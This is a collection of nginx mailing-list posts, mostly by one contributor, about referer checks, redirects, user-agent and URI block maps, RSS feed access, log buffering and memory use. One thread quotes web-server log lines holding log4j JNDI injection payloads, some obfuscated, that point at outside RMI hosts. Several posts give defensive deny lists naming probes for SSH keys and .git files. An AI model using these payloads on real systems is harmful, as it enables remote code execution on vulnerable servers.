Question regarding $invalid_referer

2024-03-05 Thread li...@lazygranch.com
I am presently using a scheme like this to prevent scraping documents. 

   location /images/ {
  valid_referers none blocked  www.example.com example.com 
forums.othersite.com ;
# you can tell the browser that it can only download content from the domains 
you explicitly allow
#   if ($invalid_referer) {
# return 403;
if ($invalid_referer) {
  return 302 $scheme://www.example.com;
***
I commented out some old code which just sends an error message. I
pulled that from the nginx website. I later added the code which sends
the user to the top level of the website. 

It works but the results really aren't user friendly. What I rather do
is if I find an invalid_referer to some document, I would like to
redirect the request to the html page that has my link to the document. 

I am relatively sure I will need to hand code the redirection for every
file, but plan on only doing this for pdfs. Probably 20 files.

Here is a google referral I pulled from the log file

*
302 172.0.0.0 - - [05/Mar/2024:20:18:52 +] "GET /images/ttr/0701crash.pdf 
HTTP/2.0" 145 "https://www.google.com/; "Mozilla/5.0 (Linux; Android 10; K) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36" 
"-"
**
So I would need to map /images/ttr/0701crash.pdf to the referring page
on the website.
___
nginx mailing list
nginx@nginx.org
https://mailman.nginx.org/mailman/listinfo/nginx


Re: nginx redirects all requests to root

2022-06-20 Thread li...@lazygranch.com



On Mon, 20 Jun 2022 17:23:23 -0400
"_lukman_"  wrote:

> server
> {
>listen 443 default_server ssl;
>listen [::]:443 ssl http2;
>server_name dummysite.io www.dummysite.io;
>ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; #
> managed by Certbot
>ssl_certificate_key
> /etc/letsencrypt/live/dummysite.io/privkey.pem; # managed by Certbot
>location /
>{
>   root
> /home/ubuntu/dummysite-ui/_work/dummysiteWebV1/dummysiteWebV1/build/web/;
>   index index.html index.php;
>   # try_files $uri /index.html index.php;
>}

The mail wrapping makes this kind of confusing. From my own conf file
the root line is not within location. I believe this is what you want:

server
 {
listen 443 default_server ssl;
listen [::]:443 ssl http2;
server_name dummysite.io www.dummysite.io;
ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; # managed 
by Certbot
ssl_certificate_key /etc/letsencrypt/live/dummysite.io/privkey.pem; # 
managed by Certbot
root  
/home/ubuntu/dummysite-ui/_work/dummysiteWebV1/dummysiteWebV1/build/web/;
location /
{
   index index.html index.php;
   # try_files $uri /index.html index.php;
}

I put my webroot in /usr/share/nginx/html/website1

I have this line after the server_name:
ssl_dhparam /etc/ssl/certs/dhparam.pem;

Hopefully this works. If not wait for the gurus.






___
nginx mailing list -- nginx@nginx.org
To unsubscribe send an email to nginx-le...@nginx.org


Re: 200 html return to log4j exploit

2021-12-20 Thread li...@lazygranch.com



On Mon, 20 Dec 2021 17:49:48 +
Jay Caines-Gooby  wrote:

> The request is for your index page "GET / HTTP/1.1"; that's why your
> server responded with 200 OK. The special characters are in the
> referer and user-agent fields, as a log4j system would also try to
> interpolate these, and thus be vulnerable to the exploit.
> 
> On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com
>  wrote:
> 
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. Howerver I am confused why a returned a 200 for
> > this request. The special characters in the URL are confusing.
> >
> > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET /
> > HTTP/1.1" 706
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}"
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"
> >
> > log_format  main  '$status $remote_addr - $remote_user
> > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> >   '"$http_user_agent" "$http_x_forwarded_for"';
> >
> > That is my log format from the nginx.conf.
> >
> > I now have a map to catch "jndi" in both url and agent. So far so
> > good not that it matters much. I just like to gather IP addresses
> > from hackers and block their host if it lacks eyeballs,
> > ___


Thanks for both replies. Note the hackers have done a work around to
get past my simple "map" detection. Matching jndi is not
sufficient. Examples:

103.107.245.1 - - [20/Dec/2021:14:38:15 +] "GET / HTTP/1.1" 706 
"${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" 
"${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"

103.107.245.1 - - [20/Dec/2021:14:38:16 +] "GET 
/?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A
1389%2FBinary%7D HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" 
"${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"

I can't really tell if this Indonesian IP address is an ISP or not so I guess I 
will let them slide from the firewall. The other IP is for Digital Ocean. I 
have some droplets there and yeah there are bad actors on the service. Kind of 
sad I have to block the vendor I use but probably AWS, Linode, etc is just as 
bad. For the price of the service you simply can't police it at scale. 

Probably another stupid question but what is up with this ${ stuff? I
need some terminology to google and read up on this. 
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


200 html return to log4j exploit

2021-12-19 Thread li...@lazygranch.com
I don't have any service using java so I don't believe I am subject to
this exploit. Howerver I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.

200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706 
"${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" 
"${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"

log_format  main  '$status $remote_addr - $remote_user
[$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';

That is my log format from the nginx.conf. 

I now have a map to catch "jndi" in both url and agent. So far so good
not that it matters much. I just like to gather IP addresses from
hackers and block their host if it lacks eyeballs,
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Nginx not responding to port 80 on public IP address

2021-02-04 Thread li...@lazygranch.com
I insist on encryption so this is what I use:

server {
listen 80;
server_name yourdomain.com  www.yourdomain.com ;
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
 }
return 301 https://$host$request_uri;
}

I only serve static pages so I use that filter. Obviously that is
optional. But basically every unencrypted request to 80 is mapped to an
encrypted request to 443.

On Thu, 4 Feb 2021 07:40:35 +
Adam  wrote:

> Hi all,
> 
> nginx is running and listening on port 80:
> tcp0  0 0.0.0.0:80  0.0.0.0:*
> LISTEN  0  42297  3576/nginx: master
> tcp6   0  0 :::80   :::*
>  LISTEN  0  42298  3576/nginx: master
> 
> The server responds fine to requests on port 443, serving traffic
> exactly as expected:
> tcp0  0 0.0.0.0:443 0.0.0.0:*
> LISTEN  0  42299  3576/nginx: master
> 
> However, it will not respond to traffic on port 80. I have included
> this line in my server block to listen to port 80:
> listen 80 default_server;
> listen [::]:80 default_server;
> 
> My full config can be seen at https://pastebin.com/VzY4mJpt
> 
> I have been testing by sshing to an external machine and trying telnet
> my.host.name 80 - which times out, compared to telnet my.host.name
> 443, which connects immediately.
> 
> The port is open on my router to allow port 80 traffic. This machine
> is hosted on my home network, serving personal traffic (services
> which I use, but not for general internet use). It does respond to
> port 80 internally, if I use the internal ip address
> (http://192.168.178.43).
> 
> I've kind of run out of ideas, so thought I would post here.
> 
> Thanks in advance for any support.
> 
> Adam

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Prevent direct access to files but allow download from site

2020-03-11 Thread li...@lazygranch.com
Answers intermixed below.

On Wed, 11 Mar 2020 21:23:15 -0400
"MAXMAXarena"  wrote:

> Hello @Ralph Seichter,
> what do you mean by "mutually exclusive"?
> As for the tools I mentioned, it was just an example.
> Are you telling me I can't solve this problem?
> 
> 
> Hello @garic,
> thanks for this answer, it made me understand some things. But I
> don't think I understand everything you suggest to me.
> 
> Are you suggesting me how to make the link uncrawlable, but how to
> block direct access?

If you are going to block access to a file, you should protect it from
the shall we say the less sophisticated user right down to the
unrelenting robots.txt ignoring crawler. 

Most of the webmasters want to be crawled, so they have posted what
stops the crawlers from reaching your files. Things like ajax used to be
a problem. Over the years the crawlers have become smarter. But you can
search blogs for crawling problems and then do just the opposite of
their suggestion. That is make your file hard to reach.

In other words, this is a research project.

> 
> For example, if the user downloads the file, then goes to the download
> history, sees the url, copies it and re-downloads the file. How can I
> prevent this from happening?
> 
> Maybe you've already given me the solution, but not being an expert,
> i need more details if it's not a problem, thanks.
> 

In the http block, "include" these files which contain maps. You will
have to create these files.
-
include /etc/nginx/mapbadagentlarge ;
include /etc/nginx/mapbadrefer  ;
include /etc/nginx/mapbaduri;
-

Here is how I use maps. First in the location at the webroot:
---

location / {
index  index.html index.htm;
if ($bad_uri)  { return 444; }
if ($badagent) { return 403; }
if ($bad_referer)  { return 403; }
---

403 is forbidden, but really that is found and forbidden. 444 is no
reply. Technically every internet request deserves an answer but if
they are wget-ing or whatever I hearby grant permission to 444 them (no
answer) if you want. 

A sample mapbaduri file follows. Basically place any word you find
inappropriate to be in the URL in this file. You need to use caution
that the words you put in here are not containined in a URL that is
legitimate. Incidentally these samples are real life.
-
map $request_uri $bad_uri {
default0;
~*simpleboot   1;
~*bitcoin  1;
~*wallet   1;
}
-

Next up and more relevant to your question is my mapbadagentlarge file.
This is where you trap curl and wget. There are many lists of bad
agents online. The "" seems to trap those lines with no agent. 
-
map $http_user_agent $badagent {
default0;
"" 1;
~*SpiderLing   1;
~*apitool  1;
~*pagefreezer  1;
~*curl 1;
~*360Spider1;
}

--

The mapbadrefer is up to you. If you find a website you don't want
linking to your website, you make a file as follows:

map $http_referer $bad_referer {
default0;
"~articlevault.info"   1;
"~picooly.pw"  1;
"~pictylox.pw"  1;
"~imageri.pw"  1;
"~mimgolo.pw"  1;
"~rightimage.co"   1;
"~pagefreezer.com" 1;
}
---

Note that as you block these website you will probably loose google
rank. 


> I found this stackoverflow topic that is interesting:
> https://stackoverflow.com/questions/9756837/prevent-html5-video-from-being-downloaded-right-click-saved
> 
> Read the @Tzshand answer modified by @Timo Schwarzer with 28 positive
> votes, basically it's what I would like to do, but in my case they
> are pdf files and I use Nginx not Apache.
> 

Right click trapping is pretty old school. If you do trap right clicks,
you should provide a means to save desired links using a left click. I
don't know how to do that but I'm sure the code exists.  

Don't forget the dynamic url. That prevents the url from being reused
outside of the session. I've been on the receiving end of those
dynamic URLs but never found the need to write one. So that will be a
research project for you. 

I'm in the camp that you can probably never perfectly make a file a
secret and yet serve it, but you can block many users. It is like you
can block the script kiddie, but a nation state will get you. 

> Posted at Nginx 

Re: Possible memory leak?

2019-03-08 Thread li...@lazygranch.com
On Fri, 08 Mar 2019 10:42:28 -0500
"wkbrad"  wrote:

> Thanks for that info.  It's definitely harder to notice the issue on
> small servers like that.  But you are still seeing about a 50%
> increase in ram usage there by your own tests.
> 
> The smallest server I've tested this on uses about 20M during the
> first start and about 50M after a reload is completely finished.
> 
> Not so much of a problem for small servers but definitely a big
> problem for large ones.  That said the issue is still there on small
> servers like you've just seen.
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,283216,283318#msg-283318
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

Actually the total RAM went down after a reload for my ps_mem in the
previous email. I repeated the test just using free, which could be a
polluted test, but the RAM went down again. I also did the ps_mem test
again and total RAM was reduced.

I'm not caching in nginx, if that makes a difference.

sh-4.2# free -m
  totalusedfree  shared  buff/cache   available
Mem:   1838 276 175 10413851259
Swap: 0   0   0
sh-4.2# systemctl reload nginx
sh-4.2# free -m
  totalusedfree  shared  buff/cache   available
Mem:   1838 272 180 10413851263
Swap: 0   0   0

And repeated ps_mem test:
sh-4.2# ps_mem | grep nginx
  2.3 MiB +   3.5 MiB =   5.8 MiB   nginx (2)
sh-4.2# systemctl reload nginx
sh-4.2# ps_mem | grep nginx
  1.8 MiB +   3.1 MiB =   4.9 MiB   nginx (2)


___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Possible memory leak?

2019-03-07 Thread li...@lazygranch.com
On Thu, 07 Mar 2019 13:33:39 -0500
"wkbrad"  wrote:

> Hi all,
> 
> I just wanted to share the details of what I've found about this
> issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some
> really great answers!
> 
> The more I look into this the more I'm convinced this is an issue
> with Nginx itself.  I've tested this with 3 different builds now and
> all have the exact same issue.
> 
> The first 2 types of servers I tested were both running Nginx 1.15.8
> on Centos 7 ( with 1 of them being on 6 ).  I tested about 10 of our
> over 100 servers.  This time I tested in a default install of Debian
> 9 with Nginix version 1.10.3 and the issue exists there too.  I just
> wanted to test on something completely different.
> 
> For the test, I created 50k very simple vhosts which used about 1G of
> RAM. Here is the ps_mem output.
>  94.3 MiB +   1.0 GiB =   1.1 GiB nginx (3)
> 
> After a normal reload it then uses 2x the ram:
> 186.3 MiB +   1.9 GiB =   2.1 GiB nginx (3)
> 
> And if I reload it again it briefly jumps up to about 4G during the
> reload and then goes back down to 2G.
> 
> If I instead use the "upgrade" option.  In the case of Debian,
> service nginx upgrade, then it reloads gracefully and goes back to
> using 1G again. 100.8 MiB +   1.0 GiB =   1.1 GiB nginx (3)
> 
> The difference between the "reload" and "upgrade" process is
> basically only that reload sends a HUP signal to Nginx and upgrade
> sends a USR2 and then QUIT signal.  What happens with all of those
> signals is entirely up to Nginx.  It could even ignore them if chose
> too.
> 
> Additionally, I ran the same test with Apache.  Not because I want to
> compare Nginx to Apache, they are different for a reason.  I just
> wanted to test if this was a system issue.  So I did the same thing
> on Debian 9, installed Apache and created 50k simple vhosts.  It used
> about 800M of ram and reloading did not cause that to increase at all.
> 
> All of that leads me to these questions.
> 
> Why would anyone want to use the normal reload process to reload the
> Nginx configuration?
> Shouldn't we always be using the upgrade process instead?
> Are there any downsides to doing that?
> Has anyone else noticed these issues and have you found another fix?
> 
> Look forward to hearing back and thanks in advance!
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,283216,283309#msg-283309
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx



Well for what it's worth, here is my result.
centos 7 3.10.0-957.5.1.el7.x86_64 #1 SMP Fri Feb 1 14:54:57 UTC 2019
x86_64 x86_64 x86_64 GNU/Linux

sh-4.2# nginx -v
nginx version: nginx/1.14.0


sh-4.2# ps_mem | grep nginx
  4.7 MiB +   2.1 MiB =   6.7 MiB   nginx (2)
sh-4.2# systemctl reload nginx
sh-4.2# ps_mem | grep nginx
  1.7 MiB +   4.0 MiB =   5.7 MiB   nginx (2)
sh-4.2# systemctl restart nginx
sh-4.2# ps_mem | grep nginx
804.0 KiB +   3.5 MiB =   4.2 MiB   nginx (2)
sh-4.2# ps_mem | grep nginx
  2.9 MiB +   2.9 MiB =   5.8 MiB   nginx (2)
sh-4.2# ps_mem | grep nginx
  2.9 MiB +   2.9 MiB =   5.8 MiB   nginx (2)
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: I need my “bad user agent” map not to block my rss xml file

2019-01-10 Thread li...@lazygranch.com
On Thu, 10 Jan 2019 08:50:33 +
Francis Daly  wrote:

> On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote:
> 
> Hi there,
> 
> >  location / {
> >  if ($badagent) { return 403; }
> >  }
> >  location = /feeds {
> >  try_files $uri $uri.xml $uri/ ;
> > }  
> 
> >  The "=" should force an exact match, but the badagent map is
> >  checked.  
> > 
> > Absolutely the badagent check under location / is being triggered.
> > Everything works if I comment out the check.
> > 
> > The URL to request the XML file is domain.com/feeds/file.xml .   
> 
> If the request is /feeds/file.xml, that will not exactly match
> "/feeds".
> 
>   location = /feeds/file.xml {}
> 
> should serve the file feeds/file.xml below the document root.
> 
> Or, if you want to handle all requests that start with /feeds/ in a
> similar way,
> 
>   location /feeds/ {}
> 
> or
> 
>   location ^~ /feeds/ {}
> 
> should do that. (The two are different if you have regex locations in
> the config.)
> 
>   f

There is a certain irony in that I first started out with
location /feeds/ {}
BUT I had the extra root statement. This appears to work. Thanks.

Here are a few tests:
claws rssyl plugin
200 xxx.58.22.151 - - [11/Jan/2019:03:48:25 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "libfeed 0.1" "-"

akragator
200 xxx.58.22.151 - - [11/Jan/2019:03:50:39 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "-" "-"

liferea
200 xxx.58.22.151 - - [11/Jan/2019:03:51:40 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "Liferea/1.10.19 (Linux; en_US.UTF-8; 
http://liferea.sf.net/) AppleWebKit (KHTML, like Gecko)" "-"

read on android
304 myvpnip - - [11/Jan/2019:03:55:44 +] "GET /feeds/feed.xml HTTP/1.1" 0 
"-" "Mozilla/5.0 (Linux; Android 8.1.0; myphone) AppleWebKit/537.36 (KHTML, 
like Gecko) Version/4.0 Chrome/71.0.3578.99 Mobile Safari/537.36" "-"

feedbucket (a web based reader) They use a proxy
200 162.246.57.122 - - [11/Jan/2019:04:01:06 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "FeedBucket/1.0 \x5C(+http://www.feedbucket.com\x5C)" "-"

 
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: I need my “bad user agent” map not to block my rss xml file

2019-01-09 Thread li...@lazygranch.com
On Wed, 9 Jan 2019 08:20:05 +
Francis Daly  wrote:

> On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote:
> 
> Hi there,
> 
> > Stripping down the nginx.conf file:
> > 
> > server{
> > location / {
> >  root   /usr/share/nginx/html/mydomain/public_html;
> > if ($badagent) { return 403; }
> > }
> > location = /feeds {
> > try_files $uri $uri.xml $uri/ ;
> >}
> > }
> > The "=" should force an exact match, but the badagent map is
> > checked.  
> 
> What file on your filesystem is your rss xml file?
> 
> Is it something other than /usr/local/nginx/html/feeds or
> /usr/local/nginx/html/feeds.xml?
> 
> And what request do you make to fetch your rss xml file?
> 
> Do things change if you move the "root" directive out of the
> "location" block so that it is directly in the "server" block?
> 
>   f

Good catch on the root declaration. Actually I declared it twice. Once
under server and once under location. I got rid of the declaration
under location since that is the wrong place.

So it is now:
 server{
  root   /usr/share/nginx/html/mydomain/public_html;
 location / {
 if ($badagent) { return 403; }
 }
 location = /feeds {
 try_files $uri $uri.xml $uri/ ;
}
 }

 The "=" should force an exact match, but the badagent map is
 checked.  

Absolutely the badagent check under location / is being triggered.
Everything works if I comment out the check.

The URL to request the XML file is domain.com/feeds/file.xml . 
It is located in /usr/share/nginx/html/mydomain/public_html/feeds .

Here is the access.log file. First line is with the badagent check
skipped. Second line is with it enable.
200 xxx.58.22.151 - - [10/Jan/2019:02:07:42 +] "GET /feeds/file.xml 
HTTP/1.1" 3614 "-" "-" "-"
403 xxx.58.22.151 - - [10/Jan/2019:02:08:38 +] "GET /feeds/file.xml 
HTTP/1.1" 169 "-" "-" "-"
I'm using the RSS reader Akregator in this case. Some readers work fine
since they act more like browsers.



___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Need logic to not check for bad user agent if xml file

2018-12-20 Thread li...@lazygranch.com
I have a map to check for bad user agents called badagent. I want to
set up a RSS feed. The feedreaders can have funny agents, so I need to
omit the bad agent check if the file is any xml type. 

This is rejected.

if (($request_uri != [*.xml]) && ($badagent)) {return 444; }

Suggestions?

I can put the xml files in a separate location if that helps.
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Dynamic modules versus build from scratch

2018-05-16 Thread li...@lazygranch.com
The centos nginx from the repo lacks ngx_http_hls_module. This is a
technique to add the module without compilation.
https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7

Does anyone have experience with this? I'd like to avoid building nginx
from scratch to make the updates go faster. When I ran freeBSD, I built
nginx, so that isn't the problem. Rather I want to stay as "native" to
centos as possible.
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Aborting malicious requests

2018-03-20 Thread li...@lazygranch.com
On Tue, 20 Mar 2018 13:03:09 +
"Friscia, Michael"  wrote:

> This is great, thank you again, this is a huge jumpstart!

Per NIST best practices, you should limit the HTML verbs that you
allow. A very simple website can run on just GET and HEAD. Here is how
you 444 websites trying to POST for example to your website. In this
case, only GET and HEAD are allowed.

if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;

You might as well trap bad agents. Basically whatever isn't a browser.
I found a list on github and have been adding new ones as I get
pestered.

https://paste.fedoraproject.org/paste/FI-IRICSJy1SR5mwBZxVDQ/
I called this file mapbadagentslarge. Use the same basic scheme. This
list is overkill, but it doesn't seem to slow down nginx. What you want
to avoid are the scrapers like nutch.

if ($badagent) { return 444; }

I also block bad referrals. Porn sites for instance. If a bad site links
to your site, at least you can return a 403 (not 444) and google won't
consider the link in its algorithm. You can request an incognito
browser and look at them, preferably in private. I've clicked on the
occasional odd referral only to have porn pop up my screen while at a
coffee shop. Blocking referrals will lower your google rank.

https://paste.fedoraproject.org/paste/6ZLa10-4L9KocFNJiNG~pw/

if ($bad_referer)  { return 403; }

If you are using encryption AND if you are mapping http requests to
https, you should do these maps in both the http and https blocks. It
doesn't make sense to go through the encryption process just to tell
the IP to take a hike.

What you do with the 444 entries in the access.log is up to you. You
can do nothing and probably be fine. I have scripts to get the bad IPs
and if they have no "eyes", I block them in the firewall. Determining
if they have no eyes is time consuming. You can feed the IP to
ip2location.com. A few of the IPs assigned to data centers really go to
ISPs. ISPs have eyes, so you don't want to block them. You can get the
IP space assigned to the entity with bgp.he.net.

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Aborting malicious requests

2018-03-19 Thread li...@lazygranch.com
On Mon, 19 Mar 2018 12:31:20 +
"Friscia, Michael"  wrote:

> Just a thought before I start crafting one. I am creating a
> location{} block with the intention of populating it with a ton of
> requests I want to terminate immediately with a 444 response. Before
> I start, I thought I’d ask to see if anyone has a really good one I
> can use as a base.
> 
> For example, we don’t serve PHP so I’m starting with
> Location ~* .php {
> Return 444;
> }
> 
> Then I can just include this into all my server blocks so I can
> manage the aborts all in one place. This alone reduces errors in the
> logs significantly. But now I will have to start adding in all the
> wordpress stuff, then onto php myadmin, etc. I will end up with
> something like
> 
> Location ~* (.php|wp-admin|my-admin) {
> Return 444;
> }
> 
> I can imagine the chunk inside the parenthesis is going to be pretty
> huge which is why I thought I’d reach out to see if anyone has one
> already.
> 
> Thanks,
> -mike
> 

What follows is how I block requests that shouldn't be made with normal
operation. I use a similar scheme for user agents and referrals. You
should block referrals from spam/porn sites since they can trigger some
browser blocking plugings. (AKA give you a bad reputation.) The
procedure is similar to the returning 444 procedure I am about to
outline, but you should 403 them or something other than 444. Remember
444 is a no reply method which is technically not kosher on the
internet (though it makes sense in this application).

Here is the procedure:

In nginx.conf in the http section, add this line:
include /etc/nginx/mapbaduri;


In the nginx.conf server section, add this line:
if ($bad_uri)  { return 444; }


This is the contents of the file mapbaduri that you need to create. It
creates $bad_uri, used in the conditional statement in nginx.conf. If
you actually use any of these resources, then obviously don't put them
in the list. You can also accidentally match patterns in intended
requests, so use caution. Most I created by actual request, though a
few I found suggested on the interwebs.

map $request_uri $bad_uri {
default0;
/cms1;
/mscms  1;
~*\.asp  1;
~*\.cfg  1;
~*\.cgi  1;
~*\.json 1;
~*\.php  1;
~*\.ssh  1;
~*\.xml  1;
~*\.git1;
~*\.svn1;
~*\.hg 1;
~*docs 1;
~*id_dsa   1;
~*issmall  1;
~*moodletreinar   1;
~*new_gb   1;
~*tiny_mce1;
~*vendor  1;
~*web  1;
~*_backup 1;
~*_core   1;
~*_sub1;
~*authority1;
~*/jmx  1;
~*/struts   1;
~*/action   1;
~*/lib 1;
~*/career  1;
~*/market  1;
~*elfinder1   1;
~*/assets  1;
~*place1  1;
~*/backup  1;
~*zecmd   1;
~*/mysql   1;
~*/sql 1;
~*/shop1;
~*/plus1;
~*/forum1;
/engine  1;
~*license.txt  1;
~*/includes 1;
~*/sites1;
~*/plugins  1;
~*/jeecms   1;
~*gluten   1;
~*/admin1;
~*/invoker  1;
~*/blog1;
~*xmlrpc   1;
~*/wordpress1;
~*/hndUnblock.cgi   1;
~*/test/1;
~*/cgi 1;
~*/plus1;
~/wp/  1;
~/wp-admin/1;
~*/proxy1;
~*/wp-login.php1;
~*/js

Re: newbie: nginx rtmp module

2018-03-09 Thread li...@lazygranch.com
I had a few neurons fire. I forgot nginx can load dynamic modules.

https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/

I haven't done this myself, so you are on your own at this point.


On Fri, 09 Mar 2018 11:59:30 -0500
"neuronetv"  wrote:

> I've resigned myself to the fact that there is no rtmp module here
> which leads me to the obvious question:
> 
> is it possible to install an rtmp module into this 'yum install'
> version of nginx?
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,278950,278984#msg-278984
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Flush access log buffer

2018-02-26 Thread li...@lazygranch.com
On Fri, 23 Feb 2018 18:54:48 -0800
"li...@lazygranch.com" <li...@lazygranch.com> wrote:

> On Thu, 22 Feb 2018 18:40:12 -0800
> "li...@lazygranch.com" <li...@lazygranch.com> wrote:
> 
> > When I was using FreeBSD, the access log was real time. Since I went
> > to Centos, that doesn't seem to be the case. Is there some way to
> > flush the buffer?
> > ___
> > nginx mailing list
> > nginx@nginx.org
> > http://mailman.nginx.org/mailman/listinfo/nginx  
> 
> I found a flush=x option on the command line. I set it for 1m for
> testing. Note that you need to specify a buffer size else nginx will
> choke.
> 
> ___

This flush=time option isn't working. I'm at a loss here. 

Here is some of a ls -l:
-rw-r- 1 nginx adm12936 Feb 27 02:17 access.log
-rw-r--r-- 1 nginx root4760 Feb 24 03:06 access.log-20180224.gz
-rw-r- 1 nginx adm  1738667 Feb 26 03:21 access.log-20180226

This is the ls -l on /var/log/nginx:
drwxr-xr-x. 2 root   root   4096 Feb 27 02:11 nginx

I'm not requesting a compressed log, so I assume centos is creating the
gunzip files. Usually the access.log file has content, but sometimes it
is empty and the log data is on the access.log-"date" file, which I
suspect is a roll over from access.log. That is maybe centos rolls it
but doesn't zip it right away.


http {
log_format  main  '$status $remote_addr - $remote_user [$time_local] 
"$request" '
  '$body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';
access_log  /var/log/nginx/access.log  main buffer=32k flush=1m;


uname -a
Linux 3.10.0-693.17.1.el7.x86_64 #1 SMP Thu Jan 25 20:13:58 UTC 2018 x86_64 
x86_64 x86_64 GNU/Linux

nginx -V
nginx version: nginx/1.12.2
built by gcc 4.8.5 20150623 (Red Hat 4.8.5-16) (GCC) 
built with OpenSSL 1.0.2k-fips  26 Jan 2017
TLS SNI support enabled
configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx
--modules-path=/usr/lib64/nginx/modules
--conf-path=/etc/nginx/nginx.conf
--error-log-path=/var/log/nginx/error.log
--http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid
--lock-path=/var/run/nginx.lock
--http-client-body-temp-path=/var/cache/nginx/client_temp
--http-proxy-temp-path=/var/cache/nginx/proxy_temp
--http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp
--http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp
--http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx
--group=nginx --with-http_ssl_module --with-http_realip_module
--with-http_addition_module --with-http_sub_module
--with-http_dav_module --with-http_flv_module --with-http_mp4_module
--with-http_gunzip_module --with-http_gzip_static_module
--with-http_random_index_module --with-http_secure_link_module
--with-http_stub_status_module --with-http_auth_request_module
--with-http_xslt_module=dynamic --with-http_image_filter_module=dynamic
--with-http_geoip_module=dynamic --with-http_perl_module=dynamic
--add-dynamic-module=njs-1c50334fbea6/nginx --with-threads
--with-stream --with-stream_ssl_module --with-http_slice_module
--with-mail --with-mail_ssl_module --with-file-aio --with-ipv6
--with-http_v2_module --with-cc-opt='-O2 -g -pipe -Wall
-Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong
--param=ssp-buffer-size=4 -grecord-gcc-switches -m64 -mtune=generic'
--with-ld-opt=-Wl,-E



___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


MAP location in conf file

2017-12-28 Thread li...@lazygranch.com
Presently I'm putting maps in the server location. Can they be put in
the very top to make them work for all servers? If not, I can just make
the maps into include files and insert as needed, but maybe making the
map global is more efficient.

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Centos 7 file permission problem

2017-12-20 Thread li...@lazygranch.com
Well that was it. You can't believe how many hours I wasted on that.
Thanks. Double thanks. 
I'm going to mention this in the Digital Ocean help pages. 

I disabled selinx, but I have a book laying around on how to set it up.
Eh, it is on the list. 

 On Wed, 20 Dec 2017 14:17:18 +0300
Aziz Rozyev <aroz...@nginx.com> wrote:

> Hi,
> 
> have you checked this with disabled selinux ? 
> 
> br,
> Aziz.
> 
> 
> 
> 
> 
> > On 20 Dec 2017, at 11:07, li...@lazygranch.com wrote:
> > 
> > I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I
> > have the firewalls set up properly since I can see my browser
> > requests in the access and error log. That said, I have file
> > permission problem. 
> > 
> > nginx 1.12.2
> > Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20
> > 20:32:50 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
> > 
> > 
> > nginx.conf (with comments removed for brevity and my domain name
> > remove because google)
> > ---
> > user nginx;
> > worker_processes auto;
